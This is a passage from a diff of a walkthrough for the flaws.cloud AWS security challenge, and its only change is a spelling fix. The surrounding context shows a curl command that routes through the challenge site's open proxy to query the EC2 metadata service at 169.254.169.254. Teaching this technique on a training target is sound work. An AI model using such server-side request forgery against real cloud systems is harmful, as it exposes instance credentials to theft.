ratnakar-infosec/flaws_challenge_walkthough/flaws.cloud/flaws.cloud.md

     <A HREF="http://www.google.com/">here</A>.
     </BODY></HTML>
     ```
-2. Lets try to leverage this proxy to access the metadata service that runs at `http://169.254.169.254/latest/meta-data`
+2. Let's try to leverage this proxy to access the metadata service that runs at `http://169.254.169.254/latest/meta-data`
     ```
     $ curl http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data
     ami-id